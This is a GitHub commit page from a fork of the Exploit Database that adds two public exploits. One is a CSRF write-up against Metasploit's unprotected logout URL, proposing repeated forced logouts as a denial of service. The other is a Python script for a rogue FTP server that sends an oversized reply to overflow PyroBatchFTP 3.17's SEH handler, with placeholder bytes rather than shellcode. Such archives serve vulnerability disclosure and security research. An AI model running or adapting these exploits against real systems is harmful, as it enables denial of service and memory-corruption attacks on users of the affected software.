forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
2 new exploits PyroBatchFTP 3.17 - Buffer Overflow (SEH) Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery
- Loading branch information
Offensive Security
committed
Oct 9, 2017
1 parent
4e334a2
commit 99ad37a
Showing
3 changed files
with
66 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
# Exploit Title: CSRF | ||
# Date: Wed, Aug 30, 2017 | ||
# Software Link: https://www.metasploit.com/ | ||
# Exploit Author: Dhiraj Mishra | ||
# Contact: http://twitter.com/mishradhiraj_ | ||
# Website: http://datarift.blogspot.in/ | ||
# CVE: CVE-2017-15084 (R7-2017-22) | ||
# Category: Metasploit Pro, Express, Ultimate, and Community | ||
|
||
|
||
1. Description | ||
|
||
Metasploit Pro, Express, Ultimate, and Community can encounter an issue of cross site request forgery (also known as one-click attack and is abbreviated as CSRF or XSRF), which is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. A CSRF attack attempts to exploit the trust that a specific website has in a user's browser. | ||
|
||
2. Proof of concept | ||
|
||
The MSF did not protect the logout form with csrf token, therefore i can logout any user by sending this url https://Metasploit-Server-IP:3790/logout | ||
Here's an attack vector: | ||
|
||
1) Set up a honeypot that detects MSF scans/attacks (somehow). | ||
2) Once I get a probe, fire back a logout request. | ||
3) Continue to logout the active user forever. | ||
|
||
It's less damaging than a traditional "hack back" but is sure to irritate the local red team to no end. It's essentially a user DoS. This attack may have been useful as a denial of service against Metasploit instances, allowing an attacker to prevent normal Metasploit usage. | ||
|
||
3. Rapid7 Security Bulletin | ||
|
||
https://blog.rapid7.com/2017/10/06/vulnerabilities-affecting-four-rapid7-products-fixed/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
#!/usr/bin/python | ||
|
||
print "PyroBatchFTP Local Buffer Overflow (SEH) Server" | ||
|
||
#Author: Kevin McGuigan @_h3xagram | ||
#Author Website: https://www.7elements.co.uk | ||
#Vendor Website: https://www.emtech.com | ||
#Date: 07/10/2017 | ||
#Version: 3.17 | ||
#Tested on: Windows 7 32-bit | ||
#CVE: CVE-2017-15035 | ||
|
||
|
||
import socket | ||
import sys | ||
|
||
buffer="A" * 2292 + "B" * 4 + "C" * 4 + "D" * 800 | ||
port = 21 | ||
|
||
try: | ||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
s.bind(("0.0.0.0", port)) | ||
s.listen(5) | ||
print("[+] FTP server started on port: "+str(port)+"\r\n") | ||
except: | ||
print("[+] Failed to bind the server to port: "+str(port)+"\r\n") | ||
|
||
while True: | ||
conn, addr = s.accept() | ||
conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n') | ||
print(conn.recv(1024)) | ||
conn.send("331 OK\r\n") | ||
print(conn.recv(1024)) | ||
conn.send('230 OK\r\n') | ||
print(conn.recv(1024)) | ||
conn.send('220 "'+buffer+'" is current directory\r\n') |